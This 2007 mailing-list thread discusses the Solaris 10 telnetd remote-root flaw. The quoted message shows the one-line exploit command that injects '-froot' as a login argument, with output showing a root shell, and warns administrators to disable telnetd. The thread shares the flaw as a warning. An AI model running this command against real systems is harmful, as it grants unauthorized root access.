[rescue] Solaris 10 Remote-Root Exploit
Bryan Gurney
arb_npx42 at comcast.net
Mon Feb 12 17:10:52 CST 2007
On Mon, 12 Feb 2007 08:45:40 -0500, Jonathan C. Patschke
<jp at celestrion.net> wrote:
> Just saw this on Slashdot:
>
> http://riosec.com/solaris-telnet-0-day
>
> And verified that it works:
>
> [jp at cobra:~]$ telnet -l"-froot" lic4
> Trying 10.10.100.120...
> Connected to lic4.centtech.com.
> Escape character is '^]'.
> Last login: Wed Jan 17 16:53:28 from hal10.centtech.
> Sun Microsystems Inc. SunOS 5.10 Generic January 2005
> You have mail.
> # Connection closed by foreign host.
> [jp at cobra:~]$ exit
> Connection to cobra.centtech.com closed.
>
> If you have any public-facing systems running Solaris's telnetd, you
> should disable it now. Even turning off remote root logins is
> insufficient, since this seems to bypass PAM.
>
http://the_archvile.shackspace.com/20061216_desktop_solarisomg.jpg
Now I'm very glad I selected "No".
More information about the rescue
mailing list